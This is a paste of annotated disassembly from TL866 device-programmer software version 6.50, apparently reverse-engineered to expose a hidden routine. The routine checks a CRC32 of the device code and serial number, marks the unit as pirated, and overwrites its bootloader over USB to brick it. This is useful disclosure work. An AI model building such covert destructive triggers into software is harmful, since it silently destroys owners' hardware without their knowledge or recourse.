radiomanV

TL866 V6.50 Brick routine

Oct 9th, 2016
  1. 00401BF9                 push    0FFFFFFFFh; initial value
  2. 00401BFB                 push    8; 8 characters
  3. 00401BFD                 push    offset dword_52EAB4; pointer to the device code array
  4. 00401C02                 call    sub_4629D0; calculate CRC32 of DEV Code (8 characters)
  5. 00401C07                 push    eax; initial value is the last result (crc32 of the dev code)
  6. 00401C08                 push    18h; 24 characters
  7. 00401C0A                 push    offset byte_52EB18; pointer to the serial number array
  8. 00401C0F                 call    sub_4629D0; calculate CRC32 of serial number (24 characters)
  9. 00401C14                 add     esp, 18h; restore the stack pointer
  10. 00401C17                 cmp     eax, 0C8C2F013h    ;<<- Here! the evil CRC32 (crc32 of the concatenated device code and serial number)
  11. 00401C1C                 jnz     short loc_401C7B   ; jump to normal upgrade routine if not equal
  12. 00401C1E                 mov     byte_52E96B, 0A5h  ; put a mark in the file config.dat as pirated
  13. 00401C25                 call    sub_462470; write config.dat
  14. 00401C2A                 mov     ecx, [esp+4+arg_0]; pointer to the encrypted firmware in ecx
  15. 00401C2E                 mov     InBuffer, 0AAh; put 'write command' as first argument in the write buffer
  16. 00401C35                 mov     word_52D862, 50h ; 80 bytes will be writen
  17. 00401C3E                 mov     byte_52D864, 0 ;at address 0 (!!! this is where bootloader sits!)
  18. 00401C45                 mov     byte_52D865, 0
  19. 00401C4C                 mov     byte_52D866, 0
  20. 00401C53                 xor     eax, eax; clear eax
  21. 00401C55
  22. 00401C55 loc_401C55:     ;copy 80 bytes from firmware buffer to the write buffer
  23. 00401C55                 mov     dl, [ecx+eax+280h]
  24. 00401C5C                 mov     byte_52D867[eax], dl
  25. 00401C62                 inc     eax
  26. 00401C63                 cmp     eax, 50h
  27. 00401C66                 jb      short loc_401C55
  28.                          ; and call the write routine, thus bricking the device.
  29. 00401C68                 push    57h             ; nInBufferSize (80 bytes+7 bytes header)
  30. 00401C6A                 push    offset InBuffer ; lpInBuffer (pointer to the write buffer)
  31. 00401C6F                 call    USB_Write; and brick that pirated device
  32. 00401C74                 add     esp, 8
  33. 00401C77                 pop     edi
  34. 00401C78                 pop     esi
  35. 00401C79                 pop     ebx
  36. 00401C7A                 retn
  37. 00401C7B loc_401C7B:    ; normal upgrade routine                          
  38. 00401C7B                 push    ebp
  39. 00401C7C                 push    offset aReflashingTheF ; "Reflashing the fireware......"